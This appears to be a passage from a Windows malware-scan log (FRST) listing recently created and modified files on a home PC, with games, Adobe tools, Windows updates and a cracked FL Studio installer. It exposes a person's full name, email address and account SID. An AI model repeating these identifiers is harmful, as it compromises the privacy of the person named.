2017-05-07 15:12 - 2017-05-07 15:12 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\PunkBuster
2017-05-07 15:06 - 2017-05-25 16:04 - 00000000 ____D C:\Users\Nick Schuster\Documents\My Games
2017-05-07 14:58 - 2017-05-11 23:41 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Ubisoft Game Launcher
2017-05-07 14:51 - 2017-06-05 15:36 - 00000000 ____D C:\Windows\System32\Tasks\Games
2017-05-07 14:41 - 2017-05-07 14:41 - 00282512 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2017-05-07 14:41 - 2017-05-07 14:41 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-05-07 14:38 - 2017-05-07 14:38 - 00394296 _____ (Duplex Secure Ltd.) C:\Windows\system32\Drivers\sptd.sys
2017-05-07 14:03 - 2017-05-07 14:03 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Disc_Soft_Ltd
2017-05-07 13:50 - 2017-05-07 13:50 - 00000000 ____D C:\Users\Public\Documents\Daemon Tools Images
2017-05-07 13:14 - 2017-05-07 13:53 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\DAEMON Tools Lite
2017-05-07 13:14 - 2017-05-07 13:14 - 00047672 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtliteusbbus.sys
2017-05-07 13:14 - 2017-05-07 13:14 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys
2017-05-07 13:13 - 2017-05-07 13:13 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite
2017-05-05 18:00 - 2017-05-05 18:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\WinRAR
2017-05-03 17:47 - 2017-05-03 17:47 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\redsn0w
2017-05-03 17:35 - 2017-05-04 00:15 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Apple Computer
2017-05-03 17:35 - 2017-05-04 00:15 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Apple Computer
2017-05-03 17:34 - 2017-05-03 17:34 - 00000000 ____D C:\ProgramData\Apple Computer
2017-04-28 16:50 - 2017-04-28 17:03 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\SecondLife
2017-04-23 14:16 - 2017-03-13 18:38 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\wmitomi.dll
2017-04-23 14:16 - 2017-03-13 18:29 - 02609664 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2017-04-23 14:16 - 2017-03-13 18:25 - 00285184 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2017-04-23 14:16 - 2017-03-13 18:13 - 00159232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmitomi.dll
2017-04-23 14:16 - 2017-03-13 18:07 - 02170880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2017-04-23 14:16 - 2017-03-13 18:06 - 00236032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2017-04-23 14:16 - 2017-03-11 01:38 - 00275800 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msiscsi.sys
2017-04-23 14:16 - 2017-03-09 22:52 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\wisp.dll
2017-04-23 14:16 - 2017-03-09 21:17 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wisp.dll
2017-04-23 14:16 - 2017-03-08 04:44 - 00448285 _____ C:\Windows\system32\ApnDatabase.xml
2017-04-17 12:52 - 2017-06-05 15:50 - 00000000 ____D C:\Windows\Update
2017-04-12 11:01 - 2017-04-29 00:44 - 00835576 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-04-12 11:01 - 2017-04-29 00:44 - 00177656 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-12 10:52 - 2017-03-14 16:26 - 03714560 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2017-04-12 10:51 - 2017-03-14 21:06 - 00136904 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2017-04-12 10:51 - 2017-03-14 16:09 - 02240512 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2017-04-12 10:51 - 2017-03-14 16:08 - 00897024 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2017-04-12 10:51 - 2017-03-14 16:06 - 00726528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2017-04-12 10:51 - 2017-03-13 18:13 - 00035840 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2017-04-12 10:51 - 2017-03-13 18:12 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2017-04-12 10:51 - 2017-03-13 18:08 - 00409088 _____ (Microsoft Corporation) C:\Windows\system32\WUSettingsProvider.dll
2017-04-12 10:51 - 2017-03-13 18:08 - 00095744 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2017-04-12 10:51 - 2017-03-13 17:59 - 00124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2017-04-12 10:51 - 2017-03-13 17:59 - 00029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2017-04-12 10:51 - 2017-03-13 17:56 - 00081920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2017-04-12 10:51 - 2017-03-12 17:04 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\BasicRender.sys
2017-04-12 10:51 - 2017-03-11 05:59 - 01763888 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2017-04-12 10:51 - 2017-03-11 05:56 - 01489608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2017-04-12 10:51 - 2017-03-11 05:44 - 00373080 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2017-04-12 10:51 - 2017-03-11 05:41 - 00315224 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2017-04-12 10:51 - 2017-03-09 23:08 - 00044032 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2017-04-12 10:51 - 2017-03-09 21:29 - 00035840 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2017-04-12 10:51 - 2017-03-04 21:24 - 00132096 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2017-04-12 10:51 - 2017-03-04 21:06 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2017-04-12 10:51 - 2017-03-04 20:15 - 00077824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2017-04-12 10:51 - 2017-03-04 18:37 - 03547648 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2017-04-12 10:51 - 2017-03-03 17:11 - 01697792 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2017-04-12 10:51 - 2017-03-03 17:10 - 00138752 _____ (Microsoft Corporation) C:\Windows\system32\mfmjpegdec.dll
2017-04-12 10:51 - 2017-03-03 17:06 - 01501184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2017-04-12 10:51 - 2017-03-03 17:04 - 00092672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmjpegdec.dll
2017-04-12 10:51 - 2017-02-11 20:18 - 00477184 _____ (Microsoft Corporation) C:\Windows\system32\puiobj.dll
2017-04-12 10:51 - 2017-02-11 19:00 - 00865792 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2017-04-12 10:51 - 2017-02-11 18:49 - 00269824 _____ (Microsoft Corporation) C:\Windows\system32\DafPrintProvider.dll
2017-04-12 10:51 - 2017-02-11 18:42 - 00204288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DafPrintProvider.dll
2017-04-12 10:51 - 2017-02-10 21:06 - 00285184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-04-12 10:51 - 2017-02-10 16:37 - 00046600 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdBoot.sys
2017-04-12 10:51 - 2017-02-04 19:53 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2017-04-12 10:51 - 2017-02-04 19:51 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2017-04-12 10:51 - 2017-02-04 19:19 - 00065024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\samlib.dll
2017-04-12 10:51 - 2017-02-01 21:44 - 00201728 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-04-12 10:51 - 2017-02-01 21:42 - 00401408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-04-12 10:51 - 2017-01-19 04:18 - 01113944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2017-04-12 10:51 - 2017-01-18 16:35 - 00994760 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2017-04-12 10:51 - 2017-01-18 16:34 - 00922432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2017-04-12 10:51 - 2017-01-14 22:32 - 00955016 _____ (Microsoft Corporation) C:\Windows\system32\mfmp4srcsnk.dll
2017-04-12 10:51 - 2017-01-14 21:18 - 00787688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmp4srcsnk.dll
2017-04-12 10:51 - 2017-01-12 18:51 - 00274776 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdFilter.sys
2017-04-12 10:51 - 2017-01-12 18:51 - 00117592 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdNisDrv.sys
2017-04-12 10:51 - 2017-01-12 08:12 - 00990040 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2017-04-12 10:51 - 2017-01-11 21:12 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\SessEnv.dll
2017-04-12 10:51 - 2017-01-11 19:28 - 00422744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\spaceport.sys
2017-04-12 10:51 - 2017-01-11 17:09 - 00296960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SessEnv.dll
2017-04-12 10:51 - 2017-01-11 00:37 - 00138752 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2017-04-12 10:51 - 2017-01-10 23:06 - 00840192 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll
2017-04-12 10:51 - 2017-01-10 22:46 - 01388544 _____ (Microsoft Corporation) C:\Windows\system32\mispace.dll
2017-04-12 10:51 - 2017-01-10 21:20 - 00696832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netlogon.dll
2017-04-12 10:51 - 2017-01-10 21:09 - 01108480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mispace.dll
2017-04-12 10:51 - 2017-01-06 19:25 - 02513408 _____ (Microsoft Corporation) C:\Windows\system32\storagewmi.dll
2017-04-12 10:51 - 2017-01-06 19:04 - 01495552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\storagewmi.dll
2017-04-12 10:51 - 2016-12-25 03:21 - 00040960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\scfilter.sys
2017-04-12 10:51 - 2016-12-25 03:14 - 00242176 _____ (Microsoft Corporation) C:\Windows\system32\WinSCard.dll
2017-04-12 10:51 - 2016-12-25 02:48 - 00158720 _____ (Microsoft Corporation) C:\Windows\system32\certprop.dll
2017-04-12 10:51 - 2016-12-25 02:19 - 00170496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinSCard.dll
2017-04-12 10:51 - 2016-12-25 01:39 - 00133120 _____ (Microsoft Corporation) C:\Windows\system32\ScDeviceEnum.dll
2017-04-12 10:51 - 2016-12-09 10:08 - 00379736 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storport.sys
2017-03-28 19:39 - 2017-06-05 15:50 - 00000000 ____D C:\Windows\system32\log
2017-03-22 23:56 - 2017-03-22 23:56 - 00000000 ____D C:\Users\Public\Documents\Steam
2017-03-22 23:46 - 2017-03-29 10:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty Modern Warfare Remastered
2017-03-19 16:46 - 2017-03-19 16:46 - 00000000 ____D C:\Users\Nick Schuster\Documents\Audacity
2017-03-19 16:30 - 2017-03-19 16:58 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\audacity
2017-03-19 15:51 - 2017-04-04 11:44 - 00000000 ____D C:\Users\Nick Schuster\Desktop\Viedeo
2017-03-19 15:48 - 2017-03-19 15:48 - 00000000 ____D C:\Users\Nick Schuster\Desktop\allgemein
2017-03-19 14:02 - 2017-03-19 16:15 - 00001283 _____ C:\Users\Nick Schuster\Desktop\Adobe After Effects CC 2015.lnk
2017-03-19 13:49 - 2017-03-19 13:49 - 00000000 ____D C:\Users\Public\Documents\AdobeInstalledCodecs
2017-03-19 13:44 - 2017-03-19 13:44 - 00001251 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2015.lnk
2017-03-19 13:42 - 2017-03-19 13:42 - 00001357 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Character Animator (Preview).lnk
2017-03-19 13:40 - 2017-03-19 13:49 - 00000000 ____D C:\Program Files\Common Files\Adobe
2017-03-19 13:38 - 2017-03-21 15:01 - 00001567 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Application Manager.lnk
2017-03-19 11:39 - 2017-03-19 11:39 - 00003518 _____ C:\Windows\System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-wiiu02015@outlook.de
2017-03-19 11:38 - 2017-03-21 21:32 - 00000000 ____D C:\Users\Nick Schuster\Documents\Adobe
2017-03-19 11:25 - 2017-03-19 11:55 - 00000000 ___RD C:\Users\Nick Schuster\Creative Cloud Files
2017-03-19 11:25 - 2017-03-19 11:25 - 00000000 ____D C:\ProgramData\boost_interprocess
2017-03-18 23:48 - 2017-03-18 23:48 - 00000000 ____D C:\Users\Nick Schuster\Documents\CPY_SAVES
2017-03-18 15:14 - 2017-03-18 15:22 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\MegaDownloader
2017-03-18 15:14 - 2017-03-18 15:14 - 00000000 ____D C:\Program Files\MegaDownloader
2017-03-18 14:21 - 2017-03-18 14:21 - 00000000 ____D C:\Program Files (x86)\ASIO4ALL v2
2017-03-18 14:20 - 2017-03-18 14:20 - 00000000 ____D C:\Program Files\Steinberg
2017-03-18 14:20 - 2017-03-18 14:20 - 00000000 ____D C:\Program Files (x86)\Steinberg
2017-03-18 14:19 - 2015-03-11 12:47 - 01554944 _____ (HMS hxxp://hp.vector.co.jp/authors/VA012897/) C:\Windows\SysWOW64\vorbis.acm
2017-03-18 14:19 - 2015-03-11 12:47 - 01470976 _____ (HMS hxxp://hp.vector.co.jp/authors/VA012897/) C:\Windows\system32\vorbis.acm
2017-03-18 14:14 - 2015-09-04 13:44 - 666655339 _____ (Image-Line ) C:\Users\Nick Schuster\Documents\fl studio 12 crack setup.exe
2017-03-17 15:51 - 2017-03-17 15:54 - 00000000 ___RD C:\Users\Nick Schuster\Documents\MEGA
2017-03-17 15:51 - 2017-03-17 15:51 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Mega Limited
2017-03-17 14:02 - 2017-05-31 10:46 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-03-17 13:45 - 2017-06-07 10:41 - 00003542 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2017-03-17 13:45 - 2017-06-07 10:41 - 00003414 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2017-03-17 12:30 - 2017-03-17 12:30 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Equalizer APO 1.1.2
2017-03-16 23:29 - 2017-05-14 22:50 - 00000000 ____D C:\Users\Nick Schuster\Desktop\fl studio songs
2017-03-16 13:19 - 2017-05-31 16:11 - 00001312 _____ C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-03-15 19:52 - 2017-02-04 22:30 - 01663184 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2017-03-15 19:52 - 2017-02-04 22:30 - 01523216 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2017-03-15 19:52 - 2017-02-04 22:30 - 01490128 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2017-03-15 19:52 - 2017-02-04 22:30 - 01358960 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2017-03-15 19:52 - 2017-01-05 20:09 - 07076864 _____ (Microsoft Corporation) C:\Windows\system32\glcndFilter.dll
2017-03-15 19:52 - 2017-01-05 19:13 - 07796224 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll
2017-03-15 19:51 - 2017-02-09 17:28 - 01987584 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2017-03-15 19:51 - 2017-02-09 17:19 - 01377792 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2017-03-15 19:51 - 2017-02-09 17:16 - 01560064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2017-03-15 19:51 - 2017-02-09 16:59 - 00658432 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll
2017-03-15 19:51 - 2017-02-09 16:58 - 00499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll
2017-03-15 19:51 - 2017-02-09 16:58 - 00252416 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll
2017-03-15 19:51 - 2017-02-04 21:32 - 00251392 _____ (Microsoft Corporation) C:\Windows\system32\microsoft-windows-system-events.dll
2017-03-15 19:51 - 2017-02-04 21:30 - 00285184 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2017-03-15 19:51 - 2017-02-04 20:14 - 01001472 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2017-03-15 19:51 - 2017-02-04 19:50 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\icm32.dll
2017-03-15 19:51 - 2017-02-04 19:40 - 01754112 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
2017-03-15 19:51 - 2017-02-04 19:32 - 00584704 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll
2017-03-15 19:51 - 2017-02-04 19:17 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icm32.dll
2017-03-15 19:51 - 2017-02-04 19:10 - 01491456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
2017-03-15 19:51 - 2017-02-04 19:05 - 00503808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscms.dll
2017-03-15 19:51 - 2017-01-21 23:37 - 00567152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2017-03-15 19:51 - 2017-01-21 21:27 - 00756736 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-03-15 19:51 - 2017-01-21 21:27 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-03-15 19:51 - 2017-01-21 20:40 - 00756736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2017-03-15 19:51 - 2017-01-21 20:40 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2017-03-15 19:51 - 2017-01-14 19:49 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\wininit.exe
2017-03-15 19:51 - 2017-01-11 21:37 - 02345984 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2017-03-15 19:51 - 2017-01-10 21:08 - 01549312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2017-03-15 19:51 - 2017-01-05 19:29 - 05273600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\glcndFilter.dll
2017-03-15 19:51 - 2017-01-05 18:57 - 05268480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll
2017-03-15 17:59 - 2017-03-15 17:59 - 00001110 _____ C:\Users\Public\Desktop\Adobe Photoshop CS6.lnk
2017-03-15 17:59 - 2017-03-15 17:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CS6
2017-03-15 17:59 - 2017-03-15 17:59 - 00000000 ____D C:\Program Files (x86)\Adobe Photoshop CS6
2017-03-09 19:55 - 2017-03-09 19:55 - 03526400 _____ (Intel Corporation) C:\Windows\system32\Drivers\Netwbw02.sys
2017-03-09 19:55 - 2017-03-09 19:55 - 02553264 _____ (Intel Corporation) C:\Windows\system32\Netwuw04.dll
2017-03-09 15:48 - 2017-03-09 15:48 - 10719648 _____ C:\Windows\system32\Drivers\Netwfw02.dat
2017-03-09 15:14 - 2017-02-23 16:50 - 00093360 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2017-03-09 15:14 - 2017-02-22 16:35 - 01609216 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2017-03-09 15:14 - 2017-02-22 16:35 - 00646656 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2017-03-09 15:14 - 2017-01-18 16:35 - 01286144 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2017-03-09 15:14 - 2017-01-18 16:35 - 00556544 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2017-03-09 15:14 - 2017-01-18 16:35 - 00335360 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2017-03-09 15:14 - 2017-01-18 16:35 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2017-03-09 15:14 - 2017-01-18 16:35 - 00233984 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2017-03-09 15:14 - 2017-01-18 16:35 - 00133632 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll

==================== Drei Monate: Ge鋘derte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-06-07 10:59 - 2016-07-31 16:09 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\CrashDumps
2017-06-07 10:50 - 2015-12-26 16:48 - 00003596 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3847841184-804715454-2304624315-1001
2017-06-07 10:45 - 2015-12-26 22:26 - 00000180 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-06-07 10:45 - 2015-12-26 17:53 - 00000000 __SHD C:\Users\Nick Schuster\IntelGraphicsProfiles
2017-06-07 10:45 - 2015-12-26 17:46 - 00000000 ___DO C:\Users\Nick Schuster\OneDrive
2017-06-07 10:44 - 2013-08-22 16:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-06-07 10:41 - 2016-10-08 16:17 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Deployment
2017-06-07 10:41 - 2016-08-02 17:25 - 00000000 ____D C:\Program Files (x86)\Google
2017-06-07 10:41 - 2015-12-27 21:26 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Google
2017-06-07 10:34 - 2016-11-18 18:55 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Pleperiedsdeied
2017-06-07 10:34 - 2016-10-13 21:24 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Sternetain
2017-06-05 15:57 - 2016-07-31 18:48 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-06-05 15:44 - 2017-02-20 22:17 - 00000000 ____D C:\Users\Nick Schuster\AppData\LocalLow\Mozilla
2017-06-05 15:42 - 2016-09-14 15:11 - 00000000 ____D C:\Users\Nick Schuster\AppData\LocalLow\Adobe
2017-06-05 15:41 - 2016-07-31 14:30 - 00000008 __RSH C:\Users\Nick Schuster\ntuser.pol
2017-06-05 15:41 - 2015-12-26 16:37 - 00000000 ____D C:\Users\Nick Schuster
2017-06-05 15:36 - 2016-11-18 14:18 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ
2017-06-05 15:36 - 2016-01-21 14:13 - 00000000 ____D C:\Users\Nick Schuster\AppData\LocalLow\Temp
2017-06-05 14:38 - 2016-01-11 18:42 - 07433728 ___SH C:\Users\Nick Schuster\Desktop\Thumbs.db
2017-06-05 12:04 - 2014-11-21 05:35 - 01776918 _____ C:\Windows\system32\PerfStringBackup.INI
2017-06-05 12:04 - 2014-11-21 04:45 - 00765582 _____ C:\Windows\system32\perfh007.dat
2017-06-05 12:04 - 2014-11-21 04:45 - 00159366 _____ C:\Windows\system32\perfc007.dat
2017-06-05 12:04 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\Inf
2017-06-04 10:17 - 2016-09-17 17:52 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\vlc
2017-06-02 16:14 - 2016-06-01 16:03 - 01862144 ___SH C:\Users\Nick Schuster\Downloads\Thumbs.db
2017-06-01 23:52 - 2013-08-22 15:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2017-06-01 19:26 - 2015-12-29 20:54 - 00000000 ____D C:\Windows\pss
2017-06-01 12:01 - 2016-07-05 17:55 - 00000000 ____D C:\Users\Nick Schuster\AppData\LocalLow\Adblock Plus for IE
2017-05-31 17:34 - 2017-02-12 14:31 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Bluestacks
2017-05-31 17:34 - 2013-08-22 17:36 - 00000000 __RHD C:\Users\Public\Libraries
2017-05-31 17:31 - 2016-06-14 20:57 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Sony
2017-05-31 13:52 - 2016-09-17 17:56 - 00000000 ____D C:\ProgramData\Apple
2017-05-30 14:12 - 2016-12-27 21:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-05-30 14:05 - 2017-02-03 12:28 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Samsung
2017-05-30 14:05 - 2017-02-03 12:27 - 00000000 ____D C:\Program Files (x86)\Samsung
2017-05-30 14:05 - 2016-10-23 18:05 - 00000000 ____D C:\ProgramData\Samsung
2017-05-29 23:08 - 2017-02-13 16:13 - 00000000 ____D C:\Program Files (x86)\Minecraft
2017-05-29 23:08 - 2016-12-10 12:29 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\.minecraft
2017-05-29 21:59 - 2016-10-12 16:07 - 00000000 ____D C:\Program Files\Image-Line
2017-05-26 18:19 - 2016-11-18 17:58 - 00000000 ____D C:\Program Files (x86)\Steam
2017-05-26 10:55 - 2016-01-04 18:15 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-25 15:49 - 2017-02-14 16:53 - 00000000 ____D C:\ProgramData\SUPPORTDIR
2017-05-25 15:49 - 2017-02-14 16:53 - 00000000 ____D C:\ProgramData\install_backup
2017-05-25 15:49 - 2017-02-03 12:27 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-05-25 15:49 - 2016-10-13 22:01 - 00000000 ____D C:\ProgramData\TEMP
2017-05-24 11:40 - 2017-02-27 11:37 - 00000000 ____D C:\ProgramData\CanonIJPLM
2017-05-23 15:40 - 2013-08-22 17:20 - 00000000 ____D C:\Windows\CbsTemp
2017-05-23 15:34 - 2015-12-28 20:55 - 132223576 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-05-23 15:34 - 2015-12-28 20:55 - 00000000 ____D C:\Windows\system32\MRT
2017-05-22 21:46 - 2015-12-27 00:10 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Skype
2017-05-22 21:24 - 2016-09-24 19:16 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-22 21:24 - 2015-12-27 00:10 - 00002715 _____ C:\Users\Public\Desktop\Skype.lnk
2017-05-22 21:24 - 2015-12-27 00:10 - 00000000 ___RD C:\Program Files (x86)\Skype
2017-05-22 21:24 - 2015-12-27 00:10 - 00000000 ____D C:\ProgramData\Skype
2017-05-21 19:04 - 2015-12-26 22:50 - 00000000 ____D C:\Program Files (x86)\TeamViewer
2017-05-21 19:03 - 2017-02-26 13:05 - 00000991 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 12.lnk
2017-05-21 19:03 - 2017-02-26 13:05 - 00000979 _____ C:\Users\Public\Desktop\TeamViewer 12.lnk
2017-05-17 18:44 - 2016-08-20 12:01 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\TeamViewer
2017-05-17 16:58 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-05-17 16:41 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\system32\FxsTmp
2017-05-16 15:15 - 2017-03-07 15:40 - 00000000 ____D C:\Users\Nick Schuster\.gimp-2.8
2017-05-14 16:21 - 2016-07-31 16:03 - 05282048 _____ C:\Windows\system32\FNTCACHE.DAT
2017-05-14 16:16 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\PolicyDefinitions
2017-05-13 00:45 - 2017-02-12 16:33 - 00000000 ____D C:\Users\Nick Schuster\Desktop\BSHelper
2017-05-09 18:25 - 2016-11-08 22:46 - 00004496 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier
